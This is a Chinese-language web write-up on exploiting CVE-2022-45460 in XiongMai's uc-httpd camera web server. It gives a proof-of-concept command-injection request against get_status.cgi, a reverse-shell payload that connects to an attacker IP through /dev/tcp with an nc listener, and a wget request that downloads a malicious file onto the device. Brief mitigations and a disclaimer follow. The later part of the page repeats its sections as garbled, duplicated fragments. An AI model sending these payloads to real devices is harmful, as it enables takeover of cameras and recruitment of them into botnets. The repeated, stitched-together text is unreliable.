CVE-2022-45460 雄迈uc-httpd远程代码执行漏洞分析与利用<\/h1>

漏洞概述<\/h2>
CVE-2022-45460是雄迈(XiongMai) uc-httpd Web服务器中的一个严重远程代码执行漏洞。该漏洞存在于全球约7万个公开暴露的网络摄像机中使用的轻量级Web服务器中，影响范围广泛。<\/p>

受影响产品<\/h2>

雄迈(XiongMai) uc-httpd Web服务器<\/li>

使用该服务器的各种网络摄像机设备<\/li> <\/ul>

漏洞细节<\/h2>

漏洞位置<\/h3>
漏洞存在于`\/cgi-bin\/<\/code>目录下的get_status.cgi<\/code>脚本中，该脚本在处理用户输入时存在命令注入漏洞。<\/p>`

漏洞成因<\/h3>
get_status.cgi<\/code>脚本在处理cmd<\/code>参数时，直接将用户输入拼接到了系统命令中，且未进行任何过滤或转义，导致攻击者可以注入任意命令。<\/p>
漏洞验证POC<\/h3>
GET<\/span> \/cgi-bin\/get_status.cgi?cmd=ping%20127.0.0.1%26id HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> [target]<\/span>
<\/span><\/span>User-Agent:<\/span> Mozilla\/5.0<\/span>
<\/span><\/span>Accept:<\/span> *\/*<\/span>
<\/span><\/span>Connection:<\/span> close<\/span>
<\/span><\/span><\/code><\/pre>如果响应中包含uid=<\/code>等系统命令执行结果，则表明漏洞存在。<\/p>
漏洞利用<\/h2>
基本利用<\/h3>
通过构造特殊的cmd<\/code>参数，可以执行任意系统命令：<\/p>
GET<\/span> \/cgi-bin\/get_status.cgi?cmd=ping%20127.0.0.1%26[your_command] HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span><\/code><\/pre>其中%26<\/code>是&<\/code>的URL编码，用于在ping命令后添加额外的命令。<\/p>
反弹Shell<\/h3>

首先在攻击机上监听：<\/li>
<\/ol>
nc -lvnp 4444<\/span>
<\/span><\/span><\/code><\/pre>
然后发送以下请求：<\/li>
<\/ol>
GET<\/span> \/cgi-bin\/get_status.cgi?cmd=ping%20127.0.0.1%26\/bin\/bash%20-i%20%3E%26%20\/dev\/tcp\/[攻击机IP]\/4444%200%3E%261 HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> [target]<\/span>
<\/span><\/span><\/code><\/pre>文件下载<\/h3>
GET<\/span> \/cgi-bin\/get_status.cgi?cmd=ping%20127.0.0.1%26wget%20http:\/\/[攻击机IP]\/malicious%20-O%20\/tmp\/malicious HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> [target]<\/span>
<\/span><\/span><\/code><\/pre>防御措施<\/h2>
临时缓解方案<\/h3>

禁用或限制对\/cgi-bin\/get_status.cgi<\/code>的访问<\/li>
在网络边界处过滤包含可疑cmd<\/code>参数的请求<\/li>
<\/ol>
长期解决方案<\/h3>

升级到厂商发布的最新固件版本<\/li>
对用户输入进行严格的过滤和验证<\/li>
使用最小权限原则运行Web服务<\/li>
<\/ol>
漏洞影响<\/h2>
该漏洞允许未经认证的攻击者在受影响设备上执行任意命令，可能导致：<\/p>

完全控制系统<\/li>
窃取敏感信息<\/li>
将设备纳入僵尸网络<\/li>
作为内网渗透的跳板<\/li>
<\/ul>
参考链接<\/h2>

NVD - CVE-2022-45460<\/a><\/li>
厂商安全公告（如有）<\/li>
<\/ul>
免责声明<\/h2>
本文档仅供安全研究和防御使用，未经授权对他人系统进行测试是违法行为。使用者需自行承担风险，作者不对任何滥用行为负责。<\/p>

CVE-2022-45460 雄迈uc-httpd远程代码执行漏洞分析与利用<\/h1>

漏洞概述<\/h2> CVE-2022-45460是雄迈(XiongMai) uc-httpd Web服务器中的一个严重远程代码执行漏洞。该漏洞存在于全球约7万个公开暴露的网络摄像机中使用的轻量级Web服务器中，影响范围广泛。<\/p>

漏洞细节<\/h2>

漏洞位置<\/h3> 漏洞存在于\/cgi-bin\/<\/code>目录下的get_status.cgi<\/code>脚本中，该脚本在处理用户输入时存在命令注入漏洞。<\/p>

防御措施<\/h2>

参考链接<\/h2> NVD - CVE-2022-45460<\/a><\/li> 厂商安全公告（如有）<\/li> <\/ul> 免责声明<\/h2> 本文档仅供安全研究和防御使用，未经授权对他人系统进行测试是违法行为。使用者需自行承担风险，作者不对任何滥用行为负责。<\/p>

免责声明<\/h2> 本文档仅供安全研究和防御使用，未经授权对他人系统进行测试是违法行为。使用者需自行承担风险，作者不对任何滥用行为负责。<\/p>

漏洞概述<\/h2>
CVE-2022-45460是雄迈(XiongMai) uc-httpd Web服务器中的一个严重远程代码执行漏洞。该漏洞存在于全球约7万个公开暴露的网络摄像机中使用的轻量级Web服务器中，影响范围广泛。<\/p>

漏洞位置<\/h3>
漏洞存在于`\/cgi-bin\/<\/code>目录下的get_status.cgi<\/code>脚本中，该脚本在处理用户输入时存在命令注入漏洞。<\/p>`

参考链接<\/h2>

NVD - CVE-2022-45460<\/a><\/li>
厂商安全公告（如有）<\/li> <\/ul>
免责声明<\/h2>
本文档仅供安全研究和防御使用，未经授权对他人系统进行测试是违法行为。使用者需自行承担风险，作者不对任何滥用行为负责。<\/p>

免责声明<\/h2>
本文档仅供安全研究和防御使用，未经授权对他人系统进行测试是违法行为。使用者需自行承担风险，作者不对任何滥用行为负责。<\/p>